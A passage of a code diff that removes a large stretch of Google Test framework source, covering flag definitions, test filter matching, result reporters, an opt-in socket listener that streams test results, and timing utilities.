-GTEST_API_ bool MatchRepetitionAndRegexAtHead(
-    bool escaped, char ch, char repeat, const char* regex, const char* str);
-GTEST_API_ bool MatchRegexAnywhere(const char* regex, const char* str);
-
-#endif  // GTEST_USES_SIMPLE_RE
-
-// Parses the command line for Google Test flags, without initializing
-// other parts of Google Test.
-GTEST_API_ void ParseGoogleTestFlagsOnly(int* argc, char** argv);
-GTEST_API_ void ParseGoogleTestFlagsOnly(int* argc, wchar_t** argv);
-
-#if GTEST_HAS_DEATH_TEST
-
-// Returns the message describing the last system error, regardless of the
-// platform.
-GTEST_API_ std::string GetLastErrnoDescription();
-
-// Attempts to parse a string into a positive integer pointed to by the
-// number parameter.  Returns true if that is possible.
-// GTEST_HAS_DEATH_TEST implies that we have ::std::string, so we can use
-// it here.
-template <typename Integer>
-bool ParseNaturalNumber(const ::std::string& str, Integer* number) {
-  // Fail fast if the given string does not begin with a digit;
-  // this bypasses strtoXXX's "optional leading whitespace and plus
-  // or minus sign" semantics, which are undesirable here.
-  if (str.empty() || !IsDigit(str[0])) {
-    return false;
-  }
-  errno = 0;
-
-  char* end;
-  // BiggestConvertible is the largest integer type that system-provided
-  // string-to-number conversion routines can return.
-
-# if GTEST_OS_WINDOWS && !defined(__GNUC__)
-
-  // MSVC and C++ Builder define __int64 instead of the standard long long.
-  typedef unsigned __int64 BiggestConvertible;
-  const BiggestConvertible parsed = _strtoui64(str.c_str(), &end, 10);
-
-# else
-
-  typedef unsigned long long BiggestConvertible;  // NOLINT
-  const BiggestConvertible parsed = strtoull(str.c_str(), &end, 10);
-
-# endif  // GTEST_OS_WINDOWS && !defined(__GNUC__)
-
-  const bool parse_success = *end == '\0' && errno == 0;
-
-  // TODO(vladl@google.com): Convert this to compile time assertion when it is
-  // available.
-  GTEST_CHECK_(sizeof(Integer) <= sizeof(parsed));
-
-  const Integer result = static_cast<Integer>(parsed);
-  if (parse_success && static_cast<BiggestConvertible>(result) == parsed) {
-    *number = result;
-    return true;
-  }
-  return false;
-}
-#endif  // GTEST_HAS_DEATH_TEST
-
-// TestResult contains some private methods that should be hidden from
-// Google Test user but are required for testing. This class allow our tests
-// to access them.
-//
-// This class is supplied only for the purpose of testing Google Test's own
-// constructs. Do not use it in user tests, either directly or indirectly.
-class TestResultAccessor {
- public:
-  static void RecordProperty(TestResult* test_result,
-                             const std::string& xml_element,
-                             const TestProperty& property) {
-    test_result->RecordProperty(xml_element, property);
-  }
-
-  static void ClearTestPartResults(TestResult* test_result) {
-    test_result->ClearTestPartResults();
-  }
-
-  static const std::vector<testing::TestPartResult>& test_part_results(
-      const TestResult& test_result) {
-    return test_result.test_part_results();
-  }
-};
-
-#if GTEST_CAN_STREAM_RESULTS_
-
-// Streams test results to the given port on the given host machine.
-class StreamingListener : public EmptyTestEventListener {
- public:
-  // Abstract base class for writing strings to a socket.
-  class AbstractSocketWriter {
-   public:
-    virtual ~AbstractSocketWriter() {}
-
-    // Sends a string to the socket.
-    virtual void Send(const string& message) = 0;
-
-    // Closes the socket.
-    virtual void CloseConnection() {}
-
-    // Sends a string and a newline to the socket.
-    void SendLn(const string& message) {
-      Send(message + "\n");
-    }
-  };
-
-  // Concrete class for actually writing strings to a socket.
-  class SocketWriter : public AbstractSocketWriter {
-   public:
-    SocketWriter(const string& host, const string& port)
-        : sockfd_(-1), host_name_(host), port_num_(port) {
-      MakeConnection();
-    }
-
-    virtual ~SocketWriter() {
-      if (sockfd_ != -1)
-        CloseConnection();
-    }
-
-    // Sends a string to the socket.
-    virtual void Send(const string& message) {
-      GTEST_CHECK_(sockfd_ != -1)
-          << "Send() can be called only when there is a connection.";
-
-      const int len = static_cast<int>(message.length());
-      if (write(sockfd_, message.c_str(), len) != len) {
-        GTEST_LOG_(WARNING)
-            << "stream_result_to: failed to stream to "
-            << host_name_ << ":" << port_num_;
-      }
-    }
-
-   private:
-    // Creates a client socket and connects to the server.
-    void MakeConnection();
-
-    // Closes the socket.
-    void CloseConnection() {
-      GTEST_CHECK_(sockfd_ != -1)
-          << "CloseConnection() can be called only when there is a connection.";
-
-      close(sockfd_);
-      sockfd_ = -1;
-    }
-
-    int sockfd_;  // socket file descriptor
-    const string host_name_;
-    const string port_num_;
-
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(SocketWriter);
-  };  // class SocketWriter
-
-  // Escapes '=', '&', '%', and '\n' characters in str as "%xx".
-  static string UrlEncode(const char* str);
-
-  StreamingListener(const string& host, const string& port)
-      : socket_writer_(new SocketWriter(host, port)) { Start(); }
-
-  explicit StreamingListener(AbstractSocketWriter* socket_writer)
-      : socket_writer_(socket_writer) { Start(); }
-
-  void OnTestProgramStart(const UnitTest& /* unit_test */) {
-    SendLn("event=TestProgramStart");
-  }
-
-  void OnTestProgramEnd(const UnitTest& unit_test) {
-    // Note that Google Test current only report elapsed time for each
-    // test iteration, not for the entire test program.
-    SendLn("event=TestProgramEnd&passed=" + FormatBool(unit_test.Passed()));
-
-    // Notify the streaming server to stop.
-    socket_writer_->CloseConnection();
-  }
-
-  void OnTestIterationStart(const UnitTest& /* unit_test */, int iteration) {
-    SendLn("event=TestIterationStart&iteration=" +
-           StreamableToString(iteration));
-  }
-
-  void OnTestIterationEnd(const UnitTest& unit_test, int /* iteration */) {
-    SendLn("event=TestIterationEnd&passed=" +
-           FormatBool(unit_test.Passed()) + "&elapsed_time=" +
-           StreamableToString(unit_test.elapsed_time()) + "ms");
-  }
-
-  void OnTestCaseStart(const TestCase& test_case) {
-    SendLn(std::string("event=TestCaseStart&name=") + test_case.name());
-  }
-
-  void OnTestCaseEnd(const TestCase& test_case) {
-    SendLn("event=TestCaseEnd&passed=" + FormatBool(test_case.Passed())
-           + "&elapsed_time=" + StreamableToString(test_case.elapsed_time())
-           + "ms");
-  }
-
-  void OnTestStart(const TestInfo& test_info) {
-    SendLn(std::string("event=TestStart&name=") + test_info.name());
-  }
-
-  void OnTestEnd(const TestInfo& test_info) {
-    SendLn("event=TestEnd&passed=" +
-           FormatBool((test_info.result())->Passed()) +
-           "&elapsed_time=" +
-           StreamableToString((test_info.result())->elapsed_time()) + "ms");
-  }
-
-  void OnTestPartResult(const TestPartResult& test_part_result) {
-    const char* file_name = test_part_result.file_name();
-    if (file_name == NULL)
-      file_name = "";
-    SendLn("event=TestPartResult&file=" + UrlEncode(file_name) +
-           "&line=" + StreamableToString(test_part_result.line_number()) +
-           "&message=" + UrlEncode(test_part_result.message()));
-  }
-
- private:
-  // Sends the given message and a newline to the socket.
-  void SendLn(const string& message) { socket_writer_->SendLn(message); }
-
-  // Called at the start of streaming to notify the receiver what
-  // protocol we are using.
-  void Start() { SendLn("gtest_streaming_protocol_version=1.0"); }
-
-  string FormatBool(bool value) { return value ? "1" : "0"; }
-
-  const scoped_ptr<AbstractSocketWriter> socket_writer_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(StreamingListener);
-};  // class StreamingListener
-
-#endif  // GTEST_CAN_STREAM_RESULTS_
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_SRC_GTEST_INTERNAL_INL_H_
-#undef GTEST_IMPLEMENTATION_
-
-#if GTEST_OS_WINDOWS
-# define vsnprintf _vsnprintf
-#endif  // GTEST_OS_WINDOWS
-
-namespace testing {
-
-using internal::CountIf;
-using internal::ForEach;
-using internal::GetElementOr;
-using internal::Shuffle;
-
-// Constants.
-
-// A test whose test case name or test name matches this filter is
-// disabled and not run.
-static const char kDisableTestFilter[] = "DISABLED_*:*/DISABLED_*";
-
-// A test case whose name matches this filter is considered a death
-// test case and will be run before test cases whose name doesn't
-// match this filter.
-static const char kDeathTestCaseFilter[] = "*DeathTest:*DeathTest/*";
-
-// A test filter that matches everything.
-static const char kUniversalFilter[] = "*";
-
-// The default output file for XML output.
-static const char kDefaultOutputFile[] = "test_detail.xml";
-
-// The environment variable name for the test shard index.
-static const char kTestShardIndex[] = "GTEST_SHARD_INDEX";
-// The environment variable name for the total number of test shards.
-static const char kTestTotalShards[] = "GTEST_TOTAL_SHARDS";
-// The environment variable name for the test shard status file.
-static const char kTestShardStatusFile[] = "GTEST_SHARD_STATUS_FILE";
-
-namespace internal {
-
-// The text used in failure messages to indicate the start of the
-// stack trace.
-const char kStackTraceMarker[] = "\nStack trace:\n";
-
-// g_help_flag is true iff the --help flag or an equivalent form is
-// specified on the command line.
-bool g_help_flag = false;
-
-}  // namespace internal
-
-static const char* GetDefaultFilter() {
-  return kUniversalFilter;
-}
-
-GTEST_DEFINE_bool_(
-    also_run_disabled_tests,
-    internal::BoolFromGTestEnv("also_run_disabled_tests", false),
-    "Run disabled tests too, in addition to the tests normally being run.");
-
-GTEST_DEFINE_bool_(
-    break_on_failure,
-    internal::BoolFromGTestEnv("break_on_failure", false),
-    "True iff a failed assertion should be a debugger break-point.");
-
-GTEST_DEFINE_bool_(
-    catch_exceptions,
-    internal::BoolFromGTestEnv("catch_exceptions", true),
-    "True iff " GTEST_NAME_
-    " should catch exceptions and treat them as test failures.");
-
-GTEST_DEFINE_string_(
-    color,
-    internal::StringFromGTestEnv("color", "auto"),
-    "Whether to use colors in the output.  Valid values: yes, no, "
-    "and auto.  'auto' means to use colors if the output is "
-    "being sent to a terminal and the TERM environment variable "
-    "is set to a terminal type that supports colors.");
-
-GTEST_DEFINE_string_(
-    filter,
-    internal::StringFromGTestEnv("filter", GetDefaultFilter()),
-    "A colon-separated list of glob (not regex) patterns "
-    "for filtering the tests to run, optionally followed by a "
-    "'-' and a : separated list of negative patterns (tests to "
-    "exclude).  A test is run if it matches one of the positive "
-    "patterns and does not match any of the negative patterns.");
-
-GTEST_DEFINE_bool_(list_tests, false,
-                   "List all tests without running them.");
-
-GTEST_DEFINE_string_(
-    output,
-    internal::StringFromGTestEnv("output", ""),
-    "A format (currently must be \"xml\"), optionally followed "
-    "by a colon and an output file name or directory. A directory "
-    "is indicated by a trailing pathname separator. "
-    "Examples: \"xml:filename.xml\", \"xml::directoryname/\". "
-    "If a directory is specified, output files will be created "
-    "within that directory, with file-names based on the test "
-    "executable's name and, if necessary, made unique by adding "
-    "digits.");
-
-GTEST_DEFINE_bool_(
-    print_time,
-    internal::BoolFromGTestEnv("print_time", true),
-    "True iff " GTEST_NAME_
-    " should display elapsed time in text output.");
-
-GTEST_DEFINE_int32_(
-    random_seed,
-    internal::Int32FromGTestEnv("random_seed", 0),
-    "Random number seed to use when shuffling test orders.  Must be in range "
-    "[1, 99999], or 0 to use a seed based on the current time.");
-
-GTEST_DEFINE_int32_(
-    repeat,
-    internal::Int32FromGTestEnv("repeat", 1),
-    "How many times to repeat each test.  Specify a negative number "
-    "for repeating forever.  Useful for shaking out flaky tests.");
-
-GTEST_DEFINE_bool_(
-    show_internal_stack_frames, false,
-    "True iff " GTEST_NAME_ " should include internal stack frames when "
-    "printing test failure stack traces.");
-
-GTEST_DEFINE_bool_(
-    shuffle,
-    internal::BoolFromGTestEnv("shuffle", false),
-    "True iff " GTEST_NAME_
-    " should randomize tests' order on every run.");
-
-GTEST_DEFINE_int32_(
-    stack_trace_depth,
-    internal::Int32FromGTestEnv("stack_trace_depth", kMaxStackTraceDepth),
-    "The maximum number of stack frames to print when an "
-    "assertion fails.  The valid range is 0 through 100, inclusive.");
-
-GTEST_DEFINE_string_(
-    stream_result_to,
-    internal::StringFromGTestEnv("stream_result_to", ""),
-    "This flag specifies the host name and the port number on which to stream "
-    "test results. Example: \"localhost:555\". The flag is effective only on "
-    "Linux.");
-
-GTEST_DEFINE_bool_(
-    throw_on_failure,
-    internal::BoolFromGTestEnv("throw_on_failure", false),
-    "When this flag is specified, a failed assertion will throw an exception "
-    "if exceptions are enabled or exit the program with a non-zero code "
-    "otherwise.");
-
-namespace internal {
-
-// Generates a random number from [0, range), using a Linear
-// Congruential Generator (LCG).  Crashes if 'range' is 0 or greater
-// than kMaxRange.
-UInt32 Random::Generate(UInt32 range) {
-  // These constants are the same as are used in glibc's rand(3).
-  state_ = (1103515245U*state_ + 12345U) % kMaxRange;
-
-  GTEST_CHECK_(range > 0)
-      << "Cannot generate a number in the range [0, 0).";
-  GTEST_CHECK_(range <= kMaxRange)
-      << "Generation of a number in [0, " << range << ") was requested, "
-      << "but this can only generate numbers in [0, " << kMaxRange << ").";
-
-  // Converting via modulus introduces a bit of downward bias, but
-  // it's simple, and a linear congruential generator isn't too good
-  // to begin with.
-  return state_ % range;
-}
-
-// GTestIsInitialized() returns true iff the user has initialized
-// Google Test.  Useful for catching the user mistake of not initializing
-// Google Test before calling RUN_ALL_TESTS().
-//
-// A user must call testing::InitGoogleTest() to initialize Google
-// Test.  g_init_gtest_count is set to the number of times
-// InitGoogleTest() has been called.  We don't protect this variable
-// under a mutex as it is only accessed in the main thread.
-GTEST_API_ int g_init_gtest_count = 0;
-static bool GTestIsInitialized() { return g_init_gtest_count != 0; }
-
-// Iterates over a vector of TestCases, keeping a running sum of the
-// results of calling a given int-returning method on each.
-// Returns the sum.
-static int SumOverTestCaseList(const std::vector<TestCase*>& case_list,
-                               int (TestCase::*method)() const) {
-  int sum = 0;
-  for (size_t i = 0; i < case_list.size(); i++) {
-    sum += (case_list[i]->*method)();
-  }
-  return sum;
-}
-
-// Returns true iff the test case passed.
-static bool TestCasePassed(const TestCase* test_case) {
-  return test_case->should_run() && test_case->Passed();
-}
-
-// Returns true iff the test case failed.
-static bool TestCaseFailed(const TestCase* test_case) {
-  return test_case->should_run() && test_case->Failed();
-}
-
-// Returns true iff test_case contains at least one test that should
-// run.
-static bool ShouldRunTestCase(const TestCase* test_case) {
-  return test_case->should_run();
-}
-
-// AssertHelper constructor.
-AssertHelper::AssertHelper(TestPartResult::Type type,
-                           const char* file,
-                           int line,
-                           const char* message)
-    : data_(new AssertHelperData(type, file, line, message)) {
-}
-
-AssertHelper::~AssertHelper() {
-  delete data_;
-}
-
-// Message assignment, for assertion streaming support.
-void AssertHelper::operator=(const Message& message) const {
-  UnitTest::GetInstance()->
-    AddTestPartResult(data_->type, data_->file, data_->line,
-                      AppendUserMessage(data_->message, message),
-                      UnitTest::GetInstance()->impl()
-                      ->CurrentOsStackTraceExceptTop(1)
-                      // Skips the stack frame for this function itself.
-                      );  // NOLINT
-}
-
-// Mutex for linked pointers.
-GTEST_API_ GTEST_DEFINE_STATIC_MUTEX_(g_linked_ptr_mutex);
-
-// Application pathname gotten in InitGoogleTest.
-std::string g_executable_path;
-
-// Returns the current application's name, removing directory path if that
-// is present.
-FilePath GetCurrentExecutableName() {
-  FilePath result;
-
-#if GTEST_OS_WINDOWS
-  result.Set(FilePath(g_executable_path).RemoveExtension("exe"));
-#else
-  result.Set(FilePath(g_executable_path));
-#endif  // GTEST_OS_WINDOWS
-
-  return result.RemoveDirectoryName();
-}
-
-// Functions for processing the gtest_output flag.
-
-// Returns the output format, or "" for normal printed output.
-std::string UnitTestOptions::GetOutputFormat() {
-  const char* const gtest_output_flag = GTEST_FLAG(output).c_str();
-  if (gtest_output_flag == NULL) return std::string("");
-
-  const char* const colon = strchr(gtest_output_flag, ':');
-  return (colon == NULL) ?
-      std::string(gtest_output_flag) :
-      std::string(gtest_output_flag, colon - gtest_output_flag);
-}
-
-// Returns the name of the requested output file, or the default if none
-// was explicitly specified.
-std::string UnitTestOptions::GetAbsolutePathToOutputFile() {
-  const char* const gtest_output_flag = GTEST_FLAG(output).c_str();
-  if (gtest_output_flag == NULL)
-    return "";
-
-  const char* const colon = strchr(gtest_output_flag, ':');
-  if (colon == NULL)
-    return internal::FilePath::ConcatPaths(
-        internal::FilePath(
-            UnitTest::GetInstance()->original_working_dir()),
-        internal::FilePath(kDefaultOutputFile)).string();
-
-  internal::FilePath output_name(colon + 1);
-  if (!output_name.IsAbsolutePath())
-    // TODO(wan@google.com): on Windows \some\path is not an absolute
-    // path (as its meaning depends on the current drive), yet the
-    // following logic for turning it into an absolute path is wrong.
-    // Fix it.
-    output_name = internal::FilePath::ConcatPaths(
-        internal::FilePath(UnitTest::GetInstance()->original_working_dir()),
-        internal::FilePath(colon + 1));
-
-  if (!output_name.IsDirectory())
-    return output_name.string();
-
-  internal::FilePath result(internal::FilePath::GenerateUniqueFileName(
-      output_name, internal::GetCurrentExecutableName(),
-      GetOutputFormat().c_str()));
-  return result.string();
-}
-
-// Returns true iff the wildcard pattern matches the string.  The
-// first ':' or '\0' character in pattern marks the end of it.
-//
-// This recursive algorithm isn't very efficient, but is clear and
-// works well enough for matching test names, which are short.
-bool UnitTestOptions::PatternMatchesString(const char *pattern,
-                                           const char *str) {
-  switch (*pattern) {
-    case '\0':
-    case ':':  // Either ':' or '\0' marks the end of the pattern.
-      return *str == '\0';
-    case '?':  // Matches any single character.
-      return *str != '\0' && PatternMatchesString(pattern + 1, str + 1);
-    case '*':  // Matches any string (possibly empty) of characters.
-      return (*str != '\0' && PatternMatchesString(pattern, str + 1)) ||
-          PatternMatchesString(pattern + 1, str);
-    default:  // Non-special character.  Matches itself.
-      return *pattern == *str &&
-          PatternMatchesString(pattern + 1, str + 1);
-  }
-}
-
-bool UnitTestOptions::MatchesFilter(
-    const std::string& name, const char* filter) {
-  const char *cur_pattern = filter;
-  for (;;) {
-    if (PatternMatchesString(cur_pattern, name.c_str())) {
-      return true;
-    }
-
-    // Finds the next pattern in the filter.
-    cur_pattern = strchr(cur_pattern, ':');
-
-    // Returns if no more pattern can be found.
-    if (cur_pattern == NULL) {
-      return false;
-    }
-
-    // Skips the pattern separater (the ':' character).
-    cur_pattern++;
-  }
-}
-
-// Returns true iff the user-specified filter matches the test case
-// name and the test name.
-bool UnitTestOptions::FilterMatchesTest(const std::string &test_case_name,
-                                        const std::string &test_name) {
-  const std::string& full_name = test_case_name + "." + test_name.c_str();
-
-  // Split --gtest_filter at '-', if there is one, to separate into
-  // positive filter and negative filter portions
-  const char* const p = GTEST_FLAG(filter).c_str();
-  const char* const dash = strchr(p, '-');
-  std::string positive;
-  std::string negative;
-  if (dash == NULL) {
-    positive = GTEST_FLAG(filter).c_str();  // Whole string is a positive filter
-    negative = "";
-  } else {
-    positive = std::string(p, dash);   // Everything up to the dash
-    negative = std::string(dash + 1);  // Everything after the dash
-    if (positive.empty()) {
-      // Treat '-test1' as the same as '*-test1'
-      positive = kUniversalFilter;
-    }
-  }
-
-  // A filter is a colon-separated list of patterns.  It matches a
-  // test if any pattern in it matches the test.
-  return (MatchesFilter(full_name, positive.c_str()) &&
-          !MatchesFilter(full_name, negative.c_str()));
-}
-
-#if GTEST_HAS_SEH
-// Returns EXCEPTION_EXECUTE_HANDLER if Google Test should handle the
-// given SEH exception, or EXCEPTION_CONTINUE_SEARCH otherwise.
-// This function is useful as an __except condition.
-int UnitTestOptions::GTestShouldProcessSEH(DWORD exception_code) {
-  // Google Test should handle a SEH exception if:
-  //   1. the user wants it to, AND
-  //   2. this is not a breakpoint exception, AND
-  //   3. this is not a C++ exception (VC++ implements them via SEH,
-  //      apparently).
-  //
-  // SEH exception code for C++ exceptions.
-  // (see http://support.microsoft.com/kb/185294 for more information).
-  const DWORD kCxxExceptionCode = 0xe06d7363;
-
-  bool should_handle = true;
-
-  if (!GTEST_FLAG(catch_exceptions))
-    should_handle = false;
-  else if (exception_code == EXCEPTION_BREAKPOINT)
-    should_handle = false;
-  else if (exception_code == kCxxExceptionCode)
-    should_handle = false;
-
-  return should_handle ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH;
-}
-#endif  // GTEST_HAS_SEH
-
-}  // namespace internal
-
-// The c'tor sets this object as the test part result reporter used by
-// Google Test.  The 'result' parameter specifies where to report the
-// results. Intercepts only failures from the current thread.
-ScopedFakeTestPartResultReporter::ScopedFakeTestPartResultReporter(
-    TestPartResultArray* result)
-    : intercept_mode_(INTERCEPT_ONLY_CURRENT_THREAD),
-      result_(result) {
-  Init();
-}
-
-// The c'tor sets this object as the test part result reporter used by
-// Google Test.  The 'result' parameter specifies where to report the
-// results.
-ScopedFakeTestPartResultReporter::ScopedFakeTestPartResultReporter(
-    InterceptMode intercept_mode, TestPartResultArray* result)
-    : intercept_mode_(intercept_mode),
-      result_(result) {
-  Init();
-}
-
-void ScopedFakeTestPartResultReporter::Init() {
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  if (intercept_mode_ == INTERCEPT_ALL_THREADS) {
-    old_reporter_ = impl->GetGlobalTestPartResultReporter();
-    impl->SetGlobalTestPartResultReporter(this);
-  } else {
-    old_reporter_ = impl->GetTestPartResultReporterForCurrentThread();
-    impl->SetTestPartResultReporterForCurrentThread(this);
-  }
-}
-
-// The d'tor restores the test part result reporter used by Google Test
-// before.
-ScopedFakeTestPartResultReporter::~ScopedFakeTestPartResultReporter() {
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  if (intercept_mode_ == INTERCEPT_ALL_THREADS) {
-    impl->SetGlobalTestPartResultReporter(old_reporter_);
-  } else {
-    impl->SetTestPartResultReporterForCurrentThread(old_reporter_);
-  }
-}
-
-// Increments the test part result count and remembers the result.
-// This method is from the TestPartResultReporterInterface interface.
-void ScopedFakeTestPartResultReporter::ReportTestPartResult(
-    const TestPartResult& result) {
-  result_->Append(result);
-}
-
-namespace internal {
-
-// Returns the type ID of ::testing::Test.  We should always call this
-// instead of GetTypeId< ::testing::Test>() to get the type ID of
-// testing::Test.  This is to work around a suspected linker bug when
-// using Google Test as a framework on Mac OS X.  The bug causes
-// GetTypeId< ::testing::Test>() to return different values depending
-// on whether the call is from the Google Test framework itself or
-// from user test code.  GetTestTypeId() is guaranteed to always
-// return the same value, as it always calls GetTypeId<>() from the
-// gtest.cc, which is within the Google Test framework.
-TypeId GetTestTypeId() {
-  return GetTypeId<Test>();
-}
-
-// The value of GetTestTypeId() as seen from within the Google Test
-// library.  This is solely for testing GetTestTypeId().
-extern const TypeId kTestTypeIdInGoogleTest = GetTestTypeId();
-
-// This predicate-formatter checks that 'results' contains a test part
-// failure of the given type and that the failure message contains the
-// given substring.
-AssertionResult HasOneFailure(const char* /* results_expr */,
-                              const char* /* type_expr */,
-                              const char* /* substr_expr */,
-                              const TestPartResultArray& results,
-                              TestPartResult::Type type,
-                              const string& substr) {
-  const std::string expected(type == TestPartResult::kFatalFailure ?
-                        "1 fatal failure" :
-                        "1 non-fatal failure");
-  Message msg;
-  if (results.size() != 1) {
-    msg << "Expected: " << expected << "\n"
-        << "  Actual: " << results.size() << " failures";
-    for (int i = 0; i < results.size(); i++) {
-      msg << "\n" << results.GetTestPartResult(i);
-    }
-    return AssertionFailure() << msg;
-  }
-
-  const TestPartResult& r = results.GetTestPartResult(0);
-  if (r.type() != type) {
-    return AssertionFailure() << "Expected: " << expected << "\n"
-                              << "  Actual:\n"
-                              << r;
-  }
-
-  if (strstr(r.message(), substr.c_str()) == NULL) {
-    return AssertionFailure() << "Expected: " << expected << " containing \""
-                              << substr << "\"\n"
-                              << "  Actual:\n"
-                              << r;
-  }
-
-  return AssertionSuccess();
-}
-
-// The constructor of SingleFailureChecker remembers where to look up
-// test part results, what type of failure we expect, and what
-// substring the failure message should contain.
-SingleFailureChecker:: SingleFailureChecker(
-    const TestPartResultArray* results,
-    TestPartResult::Type type,
-    const string& substr)
-    : results_(results),
-      type_(type),
-      substr_(substr) {}
-
-// The destructor of SingleFailureChecker verifies that the given
-// TestPartResultArray contains exactly one failure that has the given
-// type and contains the given substring.  If that's not the case, a
-// non-fatal failure will be generated.
-SingleFailureChecker::~SingleFailureChecker() {
-  EXPECT_PRED_FORMAT3(HasOneFailure, *results_, type_, substr_);
-}
-
-DefaultGlobalTestPartResultReporter::DefaultGlobalTestPartResultReporter(
-    UnitTestImpl* unit_test) : unit_test_(unit_test) {}
-
-void DefaultGlobalTestPartResultReporter::ReportTestPartResult(
-    const TestPartResult& result) {
-  unit_test_->current_test_result()->AddTestPartResult(result);
-  unit_test_->listeners()->repeater()->OnTestPartResult(result);
-}
-
-DefaultPerThreadTestPartResultReporter::DefaultPerThreadTestPartResultReporter(
-    UnitTestImpl* unit_test) : unit_test_(unit_test) {}
-
-void DefaultPerThreadTestPartResultReporter::ReportTestPartResult(
-    const TestPartResult& result) {
-  unit_test_->GetGlobalTestPartResultReporter()->ReportTestPartResult(result);
-}
-
-// Returns the global test part result reporter.
-TestPartResultReporterInterface*
-UnitTestImpl::GetGlobalTestPartResultReporter() {
-  internal::MutexLock lock(&global_test_part_result_reporter_mutex_);
-  return global_test_part_result_repoter_;
-}
-
-// Sets the global test part result reporter.
-void UnitTestImpl::SetGlobalTestPartResultReporter(
-    TestPartResultReporterInterface* reporter) {
-  internal::MutexLock lock(&global_test_part_result_reporter_mutex_);
-  global_test_part_result_repoter_ = reporter;
-}
-
-// Returns the test part result reporter for the current thread.
-TestPartResultReporterInterface*
-UnitTestImpl::GetTestPartResultReporterForCurrentThread() {
-  return per_thread_test_part_result_reporter_.get();
-}
-
-// Sets the test part result reporter for the current thread.
-void UnitTestImpl::SetTestPartResultReporterForCurrentThread(
-    TestPartResultReporterInterface* reporter) {
-  per_thread_test_part_result_reporter_.set(reporter);
-}
-
-// Gets the number of successful test cases.
-int UnitTestImpl::successful_test_case_count() const {
-  return CountIf(test_cases_, TestCasePassed);
-}
-
-// Gets the number of failed test cases.
-int UnitTestImpl::failed_test_case_count() const {
-  return CountIf(test_cases_, TestCaseFailed);
-}
-
-// Gets the number of all test cases.
-int UnitTestImpl::total_test_case_count() const {
-  return static_cast<int>(test_cases_.size());
-}
-
-// Gets the number of all test cases that contain at least one test
-// that should run.
-int UnitTestImpl::test_case_to_run_count() const {
-  return CountIf(test_cases_, ShouldRunTestCase);
-}
-
-// Gets the number of successful tests.
-int UnitTestImpl::successful_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::successful_test_count);
-}
-
-// Gets the number of failed tests.
-int UnitTestImpl::failed_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::failed_test_count);
-}
-
-// Gets the number of disabled tests that will be reported in the XML report.
-int UnitTestImpl::reportable_disabled_test_count() const {
-  return SumOverTestCaseList(test_cases_,
-                             &TestCase::reportable_disabled_test_count);
-}
-
-// Gets the number of disabled tests.
-int UnitTestImpl::disabled_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::disabled_test_count);
-}
-
-// Gets the number of tests to be printed in the XML report.
-int UnitTestImpl::reportable_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::reportable_test_count);
-}
-
-// Gets the number of all tests.
-int UnitTestImpl::total_test_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::total_test_count);
-}
-
-// Gets the number of tests that should run.
-int UnitTestImpl::test_to_run_count() const {
-  return SumOverTestCaseList(test_cases_, &TestCase::test_to_run_count);
-}
-
-// Returns the current OS stack trace as an std::string.
-//
-// The maximum number of stack frames to be included is specified by
-// the gtest_stack_trace_depth flag.  The skip_count parameter
-// specifies the number of top frames to be skipped, which doesn't
-// count against the number of frames to be included.
-//
-// For example, if Foo() calls Bar(), which in turn calls
-// CurrentOsStackTraceExceptTop(1), Foo() will be included in the
-// trace but Bar() and CurrentOsStackTraceExceptTop() won't.
-std::string UnitTestImpl::CurrentOsStackTraceExceptTop(int skip_count) {
-  (void)skip_count;
-  return "";
-}
-
-// Returns the current time in milliseconds.
-TimeInMillis GetTimeInMillis() {
-#if GTEST_OS_WINDOWS_MOBILE || defined(__BORLANDC__)
-  // Difference between 1970-01-01 and 1601-01-01 in milliseconds.
-  // http://analogous.blogspot.com/2005/04/epoch.html
-  const TimeInMillis kJavaEpochToWinFileTimeDelta =
-    static_cast<TimeInMillis>(116444736UL) * 100000UL;
-  const DWORD kTenthMicrosInMilliSecond = 10000;
-
-  SYSTEMTIME now_systime;
-  FILETIME now_filetime;
-  ULARGE_INTEGER now_int64;
-  // TODO(kenton@google.com): Shouldn't this just use
-  //   GetSystemTimeAsFileTime()?
-  GetSystemTime(&now_systime);
-  if (SystemTimeToFileTime(&now_systime, &now_filetime)) {
-    now_int64.LowPart = now_filetime.dwLowDateTime;
-    now_int64.HighPart = now_filetime.dwHighDateTime;
-    now_int64.QuadPart = (now_int64.QuadPart / kTenthMicrosInMilliSecond) -
-      kJavaEpochToWinFileTimeDelta;
-    return now_int64.QuadPart;
-  }
-  return 0;
-#elif GTEST_OS_WINDOWS && !GTEST_HAS_GETTIMEOFDAY_
-  __timeb64 now;
-
-  // MSVC 8 deprecates _ftime64(), so we want to suppress warning 4996
-  // (deprecated function) there.
-  // TODO(kenton@google.com): Use GetTickCount()?  Or use
-  //   SystemTimeToFileTime()
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4996)
-  _ftime64(&now);
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-  return static_cast<TimeInMillis>(now.time) * 1000 + now.millitm;
-#elif GTEST_HAS_GETTIMEOFDAY_
-  struct timeval now;
-  gettimeofday(&now, NULL);
-  return static_cast<TimeInMillis>(now.tv_sec) * 1000 + now.tv_usec / 1000;
-#else
-# error "Don't know how to get the current time on your system."
-#endif
-}
-
-// Utilities
-
-// class String.
-
-#if GTEST_OS_WINDOWS_MOBILE
-// Creates a UTF-16 wide string from the given ANSI string, allocating
-// memory using new. The caller is responsible for deleting the return
-// value using delete[]. Returns the wide string, or NULL if the
-// input is NULL.
-LPCWSTR String::AnsiToUtf16(const char* ansi) {
-  if (!ansi) return NULL;
-  const int length = strlen(ansi);
-  const int unicode_length =
-      MultiByteToWideChar(CP_ACP, 0, ansi, length,
-                          NULL, 0);
-  WCHAR* unicode = new WCHAR[unicode_length + 1];
-  MultiByteToWideChar(CP_ACP, 0, ansi, length,
-                      unicode, unicode_length);
-  unicode[unicode_length] = 0;
-  return unicode;
-}
-
-// Creates an ANSI string from the given wide string, allocating
-// memory using new. The caller is responsible for deleting the return
